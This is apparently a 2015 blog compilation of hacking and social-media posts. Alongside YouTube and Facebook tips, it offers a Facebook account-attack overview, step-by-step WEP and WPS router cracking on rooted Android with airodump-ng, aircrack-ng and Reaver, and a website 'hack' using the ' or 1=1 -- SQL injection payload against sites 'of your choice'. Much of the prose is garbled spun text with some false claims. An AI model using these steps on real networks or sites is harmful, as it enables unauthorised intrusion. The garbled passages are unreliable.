Saturday 31 October 2015

Top 6 White Hat Hackers In The World

Top 6 White Hat Hackers In The World
Let’ begin with who is a white hacker? First of all, white hacker is good, conscientious and ethical hacker, who tries to save the balance of the universe by doing good works. White hats are very useful and it goes without saying they constantly compete with black hats. White hats hackers can be compared with cats, which catch mice, namely they look for defects of the systems. Besides, white hats are computer security guards, they test systems for the level of protection and moreover they improve their skills. Mainly, white hats don’t look for fame or money, they serve in society. It is undeniable that sometimes black hat hackers became white hackers and prevent crimes, because they perfectly know what to do. So who are they main and most famous white hats of all times?
1. Stephen Wozniak
Stephen Wozniak, The Great Woz, as many hackers call him, moreover, he is “the second half” of Steve Jobs and Apple empire, became as an icon and inspiration for many people, who never lost interest in computer technology. What did he actually do? It is well-known today that he made free long-distance calls possible exploring so-called blue boxes, at the time, when high technology has made its first baby steps. Nevertheless, one should accept that Woz is an independent developer and worked for the good of people. Currently, Stephen Wozniak is preaching charity and provides new technologies. One can truly say that Stephen Wozniak made a difference in this world and he deserves to be called as a white hat hacker.
2. Tim Berners-Lee
Tim Berners-Lee is well-known around the world as fonder of the web we use - World Wide Web. No wonder that this man invented his first computer using iron, as they say necessity is the mother of invention. Doubtless, his innovating had led him to becoming a president of the Open Data Institute in 2012.
3. Linus Torvals
Linus Torvals created Linux operation system, which many of us use. At the beginning, this system was about to be called as Freax, using the combination of words “ freak” and “free”. Luckily, nowadays we know it as Linux. As Linus himself once said that all he wanted to have fun doing something he really enjoys. This seems to confirm the idea that it is the great result of having fun!
4. Tsutomu Shimomura
Tsutomu Shimomura is also a very good example of a white hat hacker. The bottom line is he tracked down another hacker – Kevin Mitnick, who actually was a black hat hacker. However, later on he has entered the ranks of white hats. Tsutomu Shimomura caught Mitnick with flying colors hacking Mitnick’s phone. Good job catching “black knight”. Currently Shimomura is CEO and CTO of Neofocal System.
5. Richard Matthew Stallman
Richard Matthew Stallman is known also by his initials – RMS. His policy is to give users freedom of usage software as well as education, freedom of voice and choice. He has developed Free software foundation, GNU project, which allows use computer and its devices for free What is more, RMS is a founder of copyright concept. Among the list if his merits are 14 doctorates and professorships.
6. Johanna Rutkowska.
When it goes about technology and computers, most of the time we mentioned men. Women weren’t pathfinders in this area, however, they have done enough to be mentioned among outstanding white hats. Thus, this smart lady could hide root kits in software and hardware and to make them invisible to a naked eye. One must admit the talent of he woman. To draw the conclusion, one can say that enumerated people have brought its own contribution in foundation and innovation of computer technologies. Until the world has such brainy “white knights”, its save.

How To View Facebook Private Profile Photo In Large Size ?

How To View Facebook Private Profile Photo In Large Size ?
Sometime you want to see clear image of someone on facebook who might not be your friend but his/her privacy setting stop you from doing this. In this tutorial i will teach you to view facebook private or locked profile picture in large size with very simple trick. How To View Facebook Locked Profile Picture ?1. Open the facebook profile of person whose profile picture is locked or is set to private. 2. Right click on the profile picture and click on Copy Image Url as shown in image below.
3. Open that image in new tab by right clicking and selecting Paste (CTRL + V) 4. Now change the value of image size highlighted below which might be s160x160 to s720x720 (If its not clear try (s320x320) 5. The image will enlarge in size. This trick does not always work

Simple Trick To Convert A Webpage To PDF File

Simple Trick To Convert A Webpage To PDF File

In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.

How To Save Web Page To PDF File ?
1. Open the Google Chrome Browser on your PC or MAC
2. Then go to the web page that you want to convert as a PDF.
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document.

Thursday 29 October 2015

Make money from YouTube videos

Make money from YouTube videos
Remember that viral video you laughed at yesterday while chowing down on your doughnuts? That video could have earned the maker more than £100,000.We’re not kidding when we say you can earn some serious dollar from YouTube videos and it might just be the funnest money making gig like EVER.
While it sadly isn’t as easy as clapping your fingers and the money appearing in your bank account like magic, making money out of YouTube videos is still a relatively simple concept.
And, in an effort to help you earn some dollar, we’ve put together this step by step guide. Send us some of your earnings maybe?


How to make money from YouTube videos
How much money can you make?
How does it work?
What do you need to get started?
How do you make your videos the bestest?
How can you make even more?


How much money can you make?
Straight in there with the killer question, you shrewd lot. Well, the answer is a bit of a mixed bag really, if we’re honest.
While you might be lucky and find a video clip of yours goes viral and earns you £100,000 (like the guy who uploaded a clip of one of his son’s biting the other one’s finger), this is very unlikely. That said, if you have got something funny, by all means give it a shot.
You’re much more likely to build up revenue by getting an audience through constant content, whether you’re making vlogs, cat videos or just talking about custard creams.You might remember the tale of 17 year old Fred Pye – he hit the news recently for earning £24,000 a year by making walk-throughs for Grand Theft Auto.
But as we said, it isn’t all like this. Livie Rose, a beauty blogger from Brighton says her pay fluctuates from thousands one month to £50 the next, and some people only report a few pounds here and there.


What can you realistically expect?
As a benchmark you can expect to make around $1.50/1000 views. This means that 1million views = $1500… That’s around £880 to us English folk.
However, keep in mind that a lot of the channels (such as Epic Mealtime) sign advertising contracts with certain companies or even promote their own merchandise, like T-shirts, which can earn them even more on top of their views alone.
It’s hard to put a total on this but the possibilities are endless depending on what your videos are about.


How does it work?
The basic deal with this is Google Adsense, a nifty little programme that allows you to monetise (we love that word) your website or videos with adverts.
After you’ve signed up with the beast that is YouTube and built a decent amount of followers and views you’ll receive an email asking if you want to monetise your videos. You’ll then be able to select videos you want to earn dollar on.
The basic gist of this is companies pay Google to advertise on your videos and you’ll get a cut of the profit.
Just to be clear, you can’t monetise any videos with copyrighted material in them. So no nicking other people’s stuff y’hear?


What do you need to get started?
Depending on what you’re planning on filming you’ll need to get your setup sorted from the beginning.
There’s no point having good content if you’re filming it on your iPhone. A decent setup goes a long way towards showing that you’re serious and having people respect your videos.
You’ll need:
A decent camera – Quality is important and you’ll need to record your videos in full 1080p HD.
Video editing software – Both PCs and Macs have pretty decent video editing software (Movie maker & iMovie) but Adobe Premier is a decent option for advanced users.
Sound recording equipment – Most cameras come with a microphone but if you’re looking for top sound quality you might need to purchase a decent microphone.
Lighting – This is not an essential but some top Youtubers swear by it.
A decent backdrop – If you’re filming a vlog or pieces to camera you might want to set up a decent backdrop. You can stick with plain white or jazz it up a bit with a collection of posters for example.


How to make your videos the bestest?
As we said before, the way this works is you get popular then you get paid. You can’t sign up to monetise videos no one has watched yet.
It makes sense really, who wants to pay to advertise on a billboard no one walks past? Yet while building up a decent audience might seem daunting, there are some easy tips that might help you get there sooner:
Choose your genre: One of the most popular genres on Youtube is gaming walk-throughs but it’s a pretty competitive. Take some time to think about what you can do well and whether you think you can make a success of it. Other genres that work well are: product reviews, comedy, how to’s, sports and films.
Choose a good username: Sounds trivial, trust us, it isn’t. You need to make your username memorable and steer clear from numbers and random characters. Yes, that means Xxx_ponysrock92_xxX is a no go. Sorry.
Catchy relevant titles: Make your title both catchy and relevant. That way people will remember it, and more people will stumble across it if they’re searching for something similar.
Upload regularly: You won’t build an audience if you stop posting! Remember, the longer you keep that audience locked in, the more monies you get.
Be original: There’s nothing wrong with tried and tested formats such as reviews or cat videos, but you have to make sure you stand out from the crowd. Go forth and be different kids!
Show your enthusiasm: You need to be creating videos about something you love. Having a passion for your videos will show! If you don’t love what you’re doing you’ll soon get bored and the videos will start to show that. The passion comes first and the money comes second…
Always make sure to follow the rules too; no inappropriate content, copyright or spamming. Play nice and you’ll be fine.


How do you make more?
If you’ve built up a pretty sizeable base and have a dedicated audience, there is one other avenue to explore aside from Google Adsense and YouTube itself.
Patreon is a great little web tool that allows your fans to sign up and donate money directly each time you post something new.
The key to this is building up an audience that appreciates you – if they like what you do the chances are they can be persuaded to part $1 or more each time you upload. Yes it’s US money, but money is money!
Also, as mentioned above, you can approach companies to talk about advertising or at the very least free sample for you to review/talk about.
You might even want to branch out into creating your own merchandise once/if you make a name for yourself.
Some of the big shots on here are earning about three thousand dollars everytime they post a new video. Yes you read that right.
So, have you decided to give YouTube video-ing a crack? We’d love to see your efforts and hear how it went! Make sure to hit us up in the comments below.


Wednesday 28 October 2015

TOP TEN OPERATING SYSTEM FOR HACKING

TOP TEN OPERATING SYSTEM FOR HACKING

So today I come up with the OS that hackers used for hacking. The top on this list is the Kali Linux which has almost all types of hacking tools that are totally free for everyone. All operating systems are based on Linux kernel, we all know the reason behind this fact, that Linux is the free and open source. Today we're discussing Top Ten Operating System For Hacking which has great penetration testing or ethical hacking tools.

1. Kali Linux

Kali Linux is a Debian-derived Linux configuration create for digital forensics and penetration testing. It’s maintained and funded by Offensive Security Ltd. Kali Linux updates its tools, and it’s available for many different platforms like VMware, ARM, and many more.

2. BackBox

It is based on Ubuntu is a Linux distribution. Your safety assessment and penetration testing want to play, then, this software should be in your repository is one. It actively protects the IT infrastructure.

3. Backtrack 5r3

As viewers of the operating system, keeping in mind the savviest security is built. It also protects data within the discipline is a useful tool for the early newcomers. These security tools today to assemble the largest database update discovery and provides a fast and easy way.

4. SELinux

Linux, or SELinux various userland tools and improved security is used for books that have an upstream repository. SELinux services and facilities as well as the usefulness of this tool are found in the compilation of policy, policy management and coverage of various capabilities.

5. Knoppix

Knoppix STD PCs that focuses on safety devices based on Knoppix Live CD Linux configuration. The GPL license following categories tools, password cracking, authentication, encryption, forensics, honeypots, intrusion detection systems, firewalls, network utilities, penetration, of packet sniffers, assemblers, risk assessment and Wi-Fi networking.

6. Pentoo

Pentoo a security assessment and penetration testing Live CD and Live USB is designed for. Based on Gentoo Linux, Pentoo both 32 and 64 bit offers installable live CD. Some tools are available with the latest version of the toolchain compiled from a tough double - Pentoo kernel security and peace are hard and extra screws.

7. Live Hacking Operating System

OS also live hacking penetration testing or ethical hacking tools useful for hacking a large package which is based on Linux. These include the inbuilt GNOME graphical user interface. There is only one command line, which is available in a second variation, and it requires very little hardware requirements.

8. Matriux Krypton

Weakerth4n later, it is based on the Debian operating system is probably the first division. It provided 300 security and ethical hacking tools, systems and cyber forensics investigations, security testing, penetration testing and network management etc.

9. NodeZero Linux

NodeZero Linux is a powerful, reliable and stable. Based on the industry leading Ubuntu Linux distribution, NodeZero Linux needs all the stability and reliability that comes with Ubuntu’s Long Term Support model, and its power comes from the tools configured to live comfortably within the environment.

10. DEFT

DEFT Operating System is based on the Linux Kernel 3 along with the Digital Advanced Response Toolkit. It uses WINE in order to run Windows tools Linux and predominantly run with the LXDE desktop environment.

So above is all about Top Ten Operating System For Hacking. Hope you like it so please don't forget to share this post with others.

TYPES OF HACKERS

TYPES OF HACKERS
Hackers are three types:-

1.    White hat hacker

2.    Gray hat hacker

3.    Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?

What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

White Hat Hacker

A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.

In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent machines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.

Publish computer, they can exploit their capabilities found a new circle. They were not limited to the constraints of the physical world, instead, they can travel through the virtual world of computers. Before the Internet, interaction and exchange of information for the Bulletin Board System (BBS) is used. When the Internet appeared, however, real explosion occurred.

Today, anyone can become a hacker. Within that value, are three types of hackers. Also known as the black hacker, cracker to obtain personal benefits in criminal activities is someone who uses his computer knowledge. A typical example of a financial institution to make some money on the exploitation of the weaknesses of the system is one.

The white hat hacker. White hat hacking can be considered like a black hacker, though, a significant difference. A white hacker does with any criminal intent. , Their system testing white hackers who want to contract companies worldwide. They test how secure their systems, and they could be found that would indicate any faults. You want to be a hacker with a white cap, Linux, a PC and an Internet connection is all you need.

Grey Hat Hackers

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime. 

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Each year, Def Which Las Vegas, Nevada is observed. However, hackers are not the only ones who go to this event. Computer media, computer security experts, lawyers, and government employees are also. The Hacker (computer security, worms, viruses, new technologies, coding, etc.) in the world, somehow, all of them related, is composed by different kinds of tracks. Besides tracks, computer hacking, lockpicking and even robots that related events are compared. Around the world, public or private institutions, to protect the system: in the end, you want to use ethical hacking, white hat hacking or whatever the name, it has a purpose. After all, hackers can now be located anywhere, and they can be counted by millions. Soon, white hat, white hat concepts like the Linux operating system or will be common knowledge. A true testament to how much our society has been affected by technology.

Black Hat Hackers

Black hat hackers all over the world have become the iconic image of hackers. For the majority of computer users, the word hacker social misfits and criminals has become a synonym for.

Of course, the media is an injustice created by their interpretation, so a hacker and a black hacker (or cracker) is what is important to learn. Therefore, the black hat techniques and how they make our life a little more difficult to learn two.

With malicious intent who breaks into computer systems or networks (you prefer cracker, or) black hat hacker is used to describe. A white hat hacker contrast, black hat hacker probably destroying files or stealing data for the purpose, takes advantage of the break. Black Hat hacker victim without notifying other hackers and / or known to the public can exploit. The other organization is able to secure it offers the opportunity to exploit the vulnerability.

HOW TO BECOME A WHITE HAT HACKER

HOW TO BECOME A WHITE HAT HACKER

Ethical hacking is the perfect career choice for those interested in problem solving, communication and IT security. Here's what it takes to become a white hat hacker.


A math wiz with an interest in cryptography, IT security and computer forensics is looking for a career path. A bachelor's and master's degrees in mathematics, and with both strong technical aspirations, Benedikt best candidate for penetration testing and ethical hacking.

Benedikt be lacking in it that will help them in the work and IT related work experience certificate. Benedikt white hat hacking and if we need more hands-on experience they can get their foot in the door will help the security recommendations of a number of IT certifications. We identify long-term career goals as you can discover some Benedikt offer alternative career paths and certification

Dear Benedikt:

His academic background is excellent. Given her math skills, just to find among his interests cryptography'm not surprised. Direct, hands-on work with the cryptography involved in the development work is to find yourself, as long as it, though, the research and educational institutions itch to scratch can be a difficult.

Namely, white hat hacking and penetration testing - on the other hand, the more aggressive side of the security seal is a perfect backdrop.

To start with the Certified Ethical Hacker (CEH) certification would urge you to go after. CEH certification is a vendor neutral and CEH certified professionals are in high demand.

CEH five-day training class without prior work experience is recommended for candidates, but also a self-study options are available to help pass the required exam. This intermediate level certification offered by EC- Council and system hacking, data, social engineering, SQL injection, trojans, worms, viruses and Service (DoS) attacks and other types of attacks, including denial, is focusing on. Candidates also cryptography, penetration testing, firewalls, honeypots and must show greater knowledge.

CEH is an interesting credential for someone with your background; hacking involves a great deal of problem solving, which you're used to in math, as well as communication skills, which you expressed an interest in. Becoming a certified white hat hacker also involves staying on the legal side of hacking, never engaging in illicit or unethical hacking activities and protecting the intellectual property of others. As part of your certification process, you'll need to agree to hold up EC-Council's code of ethics and never associate yourself with unethical hackers or malicious activities.

In addition to the CEH, you should also consider the SANS GIAC curriculum instead of either the SSCP or Security+ certifications that you mentioned. If you start with their Security Administration certs, beginning with the GSEC, you might find yourself better positioned to climb an active, well-respected and deep security curriculum. The GIAC credentials will work well with your background to set you up very nicely on your career path in IT security.

TOP 10 FACEBOOK PROFILE HACKING TECHNIQUES

TOP 10 FACEBOOK PROFILE HACKING TECHNIQUES

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers have , I have written a couple of post related to facebook hacking here. I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2013, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the Top 10 Facebook Profile Hacking Techniques
Top 10 Facebook Profile Hacking Techniques

1. Facebook Phishing

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims “Email Address” and “Password” is stored in to a text file, The hacker then downloads the text file and gets his hands on the victims credentials.

2. Keylooging

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealers

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are softwares specially designed to capture the saved passwords stored in the victim's browser, Stealers once FOOD can be extremely powerful.

4. Session Hijacking

In a session hijacking attack, connection for a hacker to access victims' accounts on a Web site used to authenticate a user uses the browser cookie stole the victims: an HTTP fees If you are accessing your session hijacking can often be very dangerous, session hijacking is widely used LAN.

5. Sidejacking With Firesheep

The attacker and the victim is on the same Wi-Fi network, but it is still popular now a days, attacks were common in late 2010 Sidejacking, Firesheep sidejacking widely used to attack, Firesheep works. HTTP session hijacking attacks as a sidejacking another name, but it is targeted by the Wi-Fi users.

6. Mobile Phone Hacking

Millions of Facebook users through their mobile phone to access Facebook. The hacker then perhaps his / her Facebook account can access the victims can access the mobile phone. A cell phone is used to monitor many of them are mobile software.

7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking

If an attacker has physical access to your computer, they just automatically store passwords in the browser program with a function to extract a USB is inserted, you also get access to the link below which can be read by the attack is posted on:

9. Man In the Middle Attacks

The victim and the attacker on the LAN and are on a switch based network, a hacker client and server W / B can place himself or he, ARP poisoning capture all traffic because of the default gateway can act as gateways to the other name for the man in the middle attacks, a very broad topic and is beyond the scope of this article,

10. Botnets

Botnets are not commonly used for hacking facebook accounts, because of it’s high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

How to Earn Money on YouTube

How to Earn Money on YouTube
You’ve probably heard stories about regular people earning money on YouTube and thought, “Hey, I can do this too!”. While earning thousands of dollars probably isn’t realistic, you can start earning money quickly, especially if you have a strong subscriber base. Follow this guide to get your videos monetized and start earning revenue off of those YouTube ads.
Steps to make money with YouTube
1.Set up and build your YouTube channel. Your channel is your personal presence on YouTube. Each YouTube account has one channel attached to it. A YouTube account is the same as a Google account, and creating a YouTube account will grant you access to other Google products, such as Gmail and Drive.
Create your account or use your existing one. Add keywords to help people find your channel. You can add keywords by navigating to the Advanced section of your Channel Settings. Make sure that your keywords are relevant to your content.
Your user name can also work for or against you. If it’s short, easy to remember, and original, people will be more apt to remember you. However if you are using an existing account, just stay with it. It doesn't help if you keep changing accounts.
2. Add content. Try to upload content that is high quality, and isn't super long. (This option can vary depending on what type of content you decide to upload) Also try to upload regularly and stay consistent with your uploads.
Even if your content isn't great at first, keep at it. Practice makes perfect. Try to make each video better than the last. You will often learn as you go.
Improve your content by either using a better camera or trying better editing software or techniques. Also try to improve the way things are filmed. Use a tripod, have a friend help you or light your scenes better. It all helps for a better end product which in turn helps you get a better audience.
By uploading regularly you can help hold an audience. People are more likely to subscribe if you add content on regular schedule, and maintain that schedule as much as possible.
Make sure to tag your videos with key words that describe the content, as well as an eye-catching description. These will help drive people to your video from YouTube searches.
3. Gain an audience. Building an audience is key to increasing your monetization. You need people to watch your ads in order to make any money off of them. There is no one secret to getting more subscribers, just make the best content that you can and they will come to you.
Keep uploading content and try to get people hooked. Send your video out on Twitter and Facebook. Share it with people. Distribute it elsewhere on the internet. Subscribers are essential to becoming a partner.
Interact with your viewers by responding to comments and making occasional videos directly related to viewer comments and questions. Connecting with your community will bring more members into that community.
4. Monetize your videos. In order to start earning money on your videos, you’ll need to enable monetization. This means you are allowing YouTube to place ads in your video. This also means that you acknowledge that there is no copyrighted material in your video.
You can monetize a video as it uploads by clicking the Monetization tab and checking the “Monetize with Ads” box.
To monetize a video after it has been uploaded, open your Video Manager and click the “$” sign next to the video that you want to monetize. Check the “Monetize with Ads” box.
5. Setup Google AdSense. You can setup Google AdSense for free at the AdSense website. Click the Sign Up Now button to begin creating your account. You must be 18 years or older to create your own account. If you are younger than that, you will need an adult to help you.
You need either PayPal or a bank account and a valid mailing address as well as other information so AdSense can verify who you are and who to send the money to. You only gain money per ad click and a smaller amount per view but it adds up over time. This is why having an audience is key.
6. Check your analytics. Once you have some videos online, monetized, and being viewed, you can check out the analytics on them to see how they are performing. Click the Analytics option in your Channel menu. Here you can view estimated earnings, ad performance, video views, demographics and more.
Use these tools to see how your content is resonating with your audience. You can change your content or your marketing if you’re finding that you aren’t attracting the users that you want to.
7. Market your videos elsewhere. Don't put your videos just on YouTube! Start a blog, make a website or post them on other video or social media sites. The more views it gets, the better. By sharing the link or embedding the video on the internet, you are increasing the chance of it getting noticed and of you making money.
8. Become a YouTube partner. YouTube Partners are YouTube members who have monetized videos with a large number of viewers. Partners gain access to more content creation tools, and can win prizes for the number of viewers they have. Partners also get access to much more community support and tips.
You can apply for YouTube partnership at any time through the YouTube Partner page. In order to gain access to the most powerful Partner programs, you need to have 15,000 cumulative watch hours for your channel over the last 90 days.
Here are some tips which can help you to gain more audience and money
1. Share your video on social media like Facebook, Twitter, etc.

2.Use key words so people see your video.

3.Upload content regularly.

4.Make sure you add tags when uploading videos.

5.Make videos with good content as well as quality.

6.Put time and effort into editing your videos.

7.Make videos based on what's popular on the Internet.

8.Create social networking site accounts (Facebook, Twitter, etc.) and advertise for yourself!
           Warning
1. Some people may leave mean comments to bring you down. Don't let them discourage you.

2.Copyrighted content can get your videos taken down, and possibly banned.

3.If any of your videos contain copyrighted content (i.e - music that you didn't make, content from movies, etc) you have less of a chance of getting into the partner program.

4.Partnerships with YouTube for most people do not earn very much. Unless you have a huge success, don't plan on a job free life.

Tuesday 27 October 2015

How to Become Popular on Facebook

How to Become Popular on Facebook
Ever wanted to know what you can do to become popular on Facebook? It has nothing to do with knowing the right people and everything to do with being Facebook savvy. By improving your profile, socializing, and connecting to a number of different networks, you can start booming with Facebook friends in a computerized heartbeat. You can also follow us on Facebook
Become popular on Facebook
1. Improve your profile. Add your best photo shot from your digital camera on Facebook. Only update your status if you have something out of the ordinary to say or if you are guaranteed to get 'likes' as this will heighten your prestige and character in your social life. People will remember you. Add a photo gallery, of you, your friends, and family members, or even vacation places.

2.Participate in many opportunities. Join as many interesting groups as you can. Add as many applications as are interesting and useful. Become fans as many things that you like, that is a great way to show your friends what you like. You don't want a bunch of profile junk. Take cool quizzes.

3.Join a network including your school or college network. You can then meet people through your network.

4.Search for as many friends as you can and add them. Add friends of friends. Add family members.

5.Socialize! Write on peoples walls only for interesting things. Do not send them virtual drinks and gifts, as many will feel irritated and annoyed. Poke some of them. Comment on photos. Give plenty of compliments,

6.Add information to your profile. Write your (IM) name on your profile. Write your e-mail address on your profile. If you want you can write your cell phone number on your profile, it's too dangerous to put your land line number on there. Put your school or college on your profile. If you have declared your major or your program, just put your major on there. Put you place of employment and previous place of employment. Facebook is somewhat of a resume so try to make it professional as possible because employers and teachers do look at your profile.
Here I have listed some tips which can help you to become Popular on Facebook
1. Try not to make facebook your "diary".

2.Look good in your photos. Do not over edit your photo's, take the picture outside for good lighting, make sure it has good quality. When taking a picture smile, put your chin down a little and look into the camera. Using picnik.com you can also whiten your teeth, even skin tone or make an zit disappear. If you're not comfortable with your smile look cute by smiling with your mouth closed. always attractive.

3.If you want to be well liked on Facebook, and in life for that matter, cultivate your friendships. Be outgoing and fun when you are around others. You'll likely get invited to parties and such, but even if you don't you can always throw a party yourself.

4.Don't give compliments to people unless they are genuine. People can tell when they aren't.

5.Like they say: "If you want to have a friend, you have to be one." People never write on your wall? Ask an old friend how it's going, or ask that girl on your soccer team if practice is cancelled, and hopefully you'll get a conversation going, giving both yours and their wall some action.

6.Like/comment the last on girl pictures,so they see that you have liked and they'll maybe like your profile picture !
7.Try to add as many people in your network as possible (the more friends) the more popular you will look!
8.Spice up your profile. There are lots of Apps out there to express your individuality. Try to put the apps in the boxes because you don't want to junk up your info.
9.Go on Facebook around 6:00-10:00pm, because you get more likes due to more people having finished work and schoolwork, so they go on Facebook as a break.
10.Don't try to tease your other friends. Make them make fun of you so that they would be closer to you.
I think this will must help you of you have any problem just comment bellow I am waiting for your response
You can also follow us on Facebook

How to Hack Wi Fi Using Android

How to Hack Wi Fi Using Android
Do you want to test your network security? It used to be that you needed a desktop OS such as Windows or Linux installed on a computer with a specific wireless network card. Now, however, you can also use certain Android devices to scan and crack wireless networks. These tools are available for free as long as your device is compatible. Hacking routers without permission is illegal. These steps are provided to test the security of your own network.
I will tell you two methods to hack wifi
1. WEP Routers
2.WPA2 WPS Routers
You can also join us at Facebook

************************************
WEP Routers
1.Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
Nexus 7
Galaxy S1/S2/S3/S4/S5
Galaxy y
Nexus One
Desire HD
Micromax A67

2.Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this article goes into more detail.

3.Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
Your device must be rooted in order to run bcmon.

4.Tap "Run bcmon terminal". This will launch a terminal similar to most Linux terminals.Type airodump-ng and tap the Enter button. AIrdump will load, and you will be taken to the command prompt again. Type airodump-ng wlan0 and tap the Enter button.

5.Identify the access point you want to crack. You will see a list of available access points. You must select am access point that is using WEP encryption.

6.Note the MAC address that appears. This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Jot this MAC address down.
Also note the Channel that the access point is broadcasting on.

7.Start scanning the channel. You will need to collect information from the access point for several hours before you can attempt to crack the password. Type airodump-ng -c channel# --bssid MAC address -w output ath0 and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery.
Replace channel# with the channel number the access point is broadcasting on (e.g. 6).
Replace MAC address with the MAC address of the router (e.g 00:0a:95:9d:68:16)
Keep scanning until you reach at least 20,000-30,000 packets.

8.Crack the password. Once you have a suitable number of packets, you can start attempting to crack the password . Return to the terminal and type aircrack-ng output*.cap and tap Enter.

9.Note the hexadecimal password when finished. After the cracking process is complete (which could take several hours), the message Key Found! will appear, followed by the key in hexadecimal form. Make sure that "Probability" is 100% or the key will not work.[2]
When you enter the key, enter it without the ":". For example, if the key was 12:34:56:78:90, you would enter 1234567890.

WPA2 WPS Routers
1.Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
Nexus 7
Galaxy Ace/S1/S2/S3
Nexus One
Desire HD

2.Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this article goes into more detail.

3.Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
Your device must be rooted in order to run bcmon.

4.Download and install Reaver. Reaver is a program developed to crack the WPS PIN in order to retrieve the WPA2 passphrase. The Reaver APK can be downloaded from the developers' thread on the XDA-developers forums.

5.Launch Reaver. Tap the Reaver for Android icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.
You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.
The access point you select must accept WPS authentication. Not all routers support this.

6.Verify your settings. In most cases you can leave the settings that appear at their default. Make sure that the "Automatic advanced settings" box is checked.

7.Start the cracking process. Tap the "Start attack" button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.
Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful.[1]
I think I have cleared all the doubts, if there is still any doubt just comment bellow

How to Hack a Website with Basic HTML Coding

How to Hack a Website with Basic HTML Coding
If you have basic HTML and JavaScript knowledge, you may be able to access password protected websites. This article will give you an easy method to hack simple, less-secured websites of your choice simply through HTML. Use it responsibly.

Note: This basic method works only for websites with extremely low security barriers. Websites with robust security details will not be susceptible to this kind of simple attack.
Steps to Hack a Website using HTML codes
1. Open the site you want to hack. Provide wrong username and wrong password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --) An error will occur saying wrong username and wrong password. Now be prepared because your experiment starts from here.
2. Right click anywhere on that error page =>> go to view source.
3. Right click anywhere on that error page =>> go to view source.
4. Delete the JavaScript from the above that validates your information in the server. Do this very carefully.—Your success in hacking the site depends upon how efficiently you delete the java script code that validates your account information.
5. Take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=password>" with "<_type=text>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write ).
6. Go to file => save as and save it anywhere in your hard disk with ext.html (e.g.: c:\chan.html).
